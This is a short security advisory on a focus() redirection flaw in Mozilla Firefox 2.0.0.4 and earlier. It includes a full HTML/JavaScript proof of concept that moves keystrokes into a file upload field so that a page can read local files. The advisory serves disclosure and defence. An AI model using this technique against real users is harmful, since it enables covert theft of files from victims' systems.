Mozilla Firefox focus() Redirection Vulnerability
------------------------------------------------------------------------

SUMMARY

A vulnerability in Mozilla Firefox allows an attacker to silently redirect the focus of selected key press events to an otherwise protected file upload form field. This is possible because of how the onKeyDown event is handled, which allows the focus to be moved between the two fields. This enables the attacker to read arbitrary files on the victim's system.

DETAILS

Vulnerable Systems:
 * Mozilla Firefox version 2.0.0.4 and prior

Exploit:
<html>
<body>
<script>
function restore()
{
 document.getElementById("text1").value=document.getElementById("file1").value;
 document.getElementById("text1").focus();
}

function doKeyDown()
{
 document.getElementById("label1").focus();
}
</script>

<input type="file" id="file1" name="file1" onkeydown="restore();" 
onkeyup="restore()" />
<label for="file1" id="label1" name="label1"></label>
<br>
<textarea name="text1" id="text1" onkeydown="doKeyDown()">
</textarea>
</body>
</html>

ADDITIONAL INFORMATION

The information has been provided by Carl Hardwick <mailto:hardwick.carl@gmail.com>.
The original article can be found at: http://yathong.googlepages.com/FirefoxFocusBug.html